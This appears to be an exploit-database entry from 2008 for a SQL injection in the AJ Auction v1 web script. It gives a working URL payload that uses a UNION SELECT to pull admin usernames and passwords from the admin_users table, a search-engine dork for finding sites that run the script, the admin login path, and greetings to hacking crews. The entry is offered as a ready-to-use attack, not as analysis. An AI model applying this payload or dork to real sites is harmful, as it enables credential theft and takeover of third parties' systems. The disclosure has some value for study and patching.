AJ Auction v1 (id) Remote SQL Injection Vulnerability

2008-06-19T00:00:00
ID 1337DAY-ID-3229
Type zdt
Reporter Hussin X
Modified 2008-06-19T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =====================================================
AJ Auction v1 (id) Remote SQL Injection Vulnerability
=====================================================



#########################################################
#
#    AJ Auction OOPD V.1  SQL Injection Vulnerability
#========================================================
#    Author: Hussin X                                   =
#=========================================================
#    HomE script : http://www.ajauctionpro.com/ajhome.php
#     
#    Demo : http://www.ajauctionpro.com/auction_2008/v1/   
#    
#          DorK :  Powered By AJ Auction
#     
##########################################################

Exploit:   

http://localhost.com/[PaTs]/[PaTs]/?do=allcat&id=-1+union+select+concat(user_name,0x3a,password)+from+admin_users--


Admin login

admin/adminindex.php

################################################################################
#####################################( Greetz )#################################
#                                                                              #
#           tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUA              #       
#                mos_chori / Rafi / FAHD / Iraq Hackers /                      #       
#                                                                              #
#################################(and All IRAQIs)###############################
################################################################################



#  0day.today [2018-01-03]  #